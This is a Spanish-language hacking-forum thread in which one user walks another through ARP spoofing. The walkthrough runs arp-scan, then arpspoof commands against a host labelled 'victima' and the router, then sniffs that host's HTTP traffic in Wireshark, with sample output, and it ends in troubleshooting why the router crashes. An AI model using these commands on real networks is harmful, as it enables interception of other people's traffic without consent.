elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless
| | |-+  Arp
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Arp  (Leído 2,327 veces)
therodri2

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Arp
« en: 12 Diciembre 2018, 01:16 am »

Borrado


« Última modificación: 27 Septiembre 2019, 21:48 pm por therodri2 » En línea

therodri2

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Arp spoof acaba en DoS
« Respuesta #1 en: 13 Diciembre 2018, 15:35 pm »

Nadie? :(


En línea

warcry.


Desconectado Desconectado

Mensajes: 1.004


Ver Perfil
Re: Arp spoof acaba en DoS
« Respuesta #2 en: 13 Diciembre 2018, 20:55 pm »

lo que solicitas es muuuu básico, por tanto nos haces perder el tiempo, ahora tengo 5 min libres y era o contestarte a ti, o al que quiere "hacer un sistema operativo", como en este caso al colega del sistema operativo solo puedo decirle que lo que intenta hacer es un juego de niños, ya que compilar un kernel no tiene merito ninguno, ya que lo que realmente es un merito es currarse tu propio kernel, entonces es probable que se lo tome a mal, asi que te contesto a ti

Código:
wifiway ~ # arp-scan 192.168.0.0/24
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.2 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.0.1     XX:XX:XX:XX:XX:XX       (router)
192.168.0.10    XX:XX:XX:XX:XX:XX        (victima)
192.168.0.11   XX:XX:XX:XX:XX:XX        VMware, Inc.
192.168.0.12   XX:XX:XX:XX:XX:XX        VMware, Inc
192.168.0.13   XX:XX:XX:XX:XX:XX        VMware, Inc
192.168.0.14   XX:XX:XX:XX:XX:XX         VMware, Inc.

con esto haces un escaneo rapido de la red, suponiendo que sepas lo que es una ip y lo que es una mascara de red, etc, etc, etc.

ahora seleccionas una victima y envenenas la red (te haces pasar por el router)
Código:
wifiway ~ # arpspoof -i eth0 -t 192.168.0.10 192.168.0.1
<aqui ves tu mac><aqui macvictima>0806 42: arp reply 192.168.0.1 is-at <aqui tu mac>
xx:xx:xx:xx:xx:xx aa:aa:aa:aa:aa:aa 0806 42: arp reply 192.168.0.1 is-at xx:xx:xx:xx:xx:xx
xx:xx:xx:xx:xx:xx aa:aa:aa:aa:aa:aa 0806 42: arp reply 192.168.0.1 is-at xx:xx:xx:xx:xx:xx
xx:xx:xx:xx:xx:xx aa:aa:aa:aa:aa:aa 0806 42: arp reply 192.168.0.1 is-at xx:xx:xx:xx:xx:xx
xx:xx:xx:xx:xx:xx aa:aa:aa:aa:aa:aa 0806 42: arp reply 192.168.0.1 is-at xx:xx:xx:xx:xx:xx

y asi sucesivamente

Y ahora la vuelta

Código:
wifiway ~ # arpspoof -i eth0 -t 192.168.0.1 192.168.0.10
<aqui ves tu mac><aqui macrouter>0806 42: arp reply 192.168.0.10 is-at <aqui tu mac>
xx:xx:xx:xx:xx:xx aa:aa:aa:aa:aa:aa 0806 42: arp reply 192.168.0.10 is-at xx:xx:xx:xx:xx:xx
xx:xx:xx:xx:xx:xx aa:aa:aa:aa:aa:aa 0806 42: arp reply 192.168.0.10 is-at xx:xx:xx:xx:xx:xx
xx:xx:xx:xx:xx:xx aa:aa:aa:aa:aa:aa 0806 42: arp reply 192.168.0.10 is-at xx:xx:xx:xx:xx:xx
xx:xx:xx:xx:xx:xx aa:aa:aa:aa:aa:aa 0806 42: arp reply 192.168.0.10 is-at xx:xx:xx:xx:xx:xx

y asi sucesivamente

ahora abres el sniffer de red que te de la gana, por ejemplo wireshark y lo pones a escuchar en la interface en mi caso la eth0

te vas al navegador de la victima lo abres y tecleas marca.es, y te vas al wireshark, pones un filtro y podras ver

Citar
GET / HTTP/1.1

Host: marca.es

Connection: keep-alive

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: es-ES,es;q=0.9



HTTP/1.1 301 Moved Permanently

Server: nginx/1.2.7

Date: Thu, 13 Dec 2018 19:26:56 GMT

Content-Type: text/html

Content-Length: 184

Connection: keep-alive

Location: http://www.marca.com/



<html>

<head><title>301 Moved Permanently</title></head>

<body bgcolor="white">

<center><h1>301 Moved Permanently</h1></center>

<hr><center>nginx/1.2.7</center>

</body>

</html>


tan sencillo como eso :silbar:
En línea

HE SIDO BANEADO --- UN PLACER ---- SALUDOS
therodri2

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Arp spoof acaba en DoS
« Respuesta #3 en: 14 Diciembre 2018, 01:53 am »

Sí te entiendo perfectamente, y en efecto hago lo mismo que tú. El problema es que se cae el router, antes de ni si quiera poder abrir Wireshark.

Disculpa si te ha caído mal mi pregunta. Más bien iba dirigido a si esto es provocado por algún sistema de seguridad que tengan los routers más modernos o si es que definitivamente hay algo raro.

Y gracias!
En línea

warcry.


Desconectado Desconectado

Mensajes: 1.004


Ver Perfil
Re: Arp spoof acaba en DoS
« Respuesta #4 en: 14 Diciembre 2018, 13:42 pm »

Sí te entiendo perfectamente, y en efecto hago lo mismo que tú. El problema es que se cae el router, antes de ni si quiera poder abrir Wireshark.

Disculpa si te ha caído mal mi pregunta. Más bien iba dirigido a si esto es provocado por algún sistema de seguridad que tengan los routers más modernos o si es que definitivamente hay algo raro.

Y gracias!

¿que marca y que modelo es? si lo sabes es probable que en sus especificaciones te diga si tiene alguna contramedida contra ataques de MITM

lo que no me cuadra es esto


Abro Wireshark y lo que veo es que no hay ningún ARP falso, todas las respuestas llevan la mac verdadera del dispositivo real y no la que estoy usando para engañar al router y al target.


si no ves ningún paquete arp simulado en wireshark es que tu distribucion linux no esta haciendo bien su trabajo, bien porque tenga algún problema de drivers, paquetes, librerias o porque estes usando una maquina virtual y no este bien configurada, etc.
En línea

HE SIDO BANEADO --- UN PLACER ---- SALUDOS
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines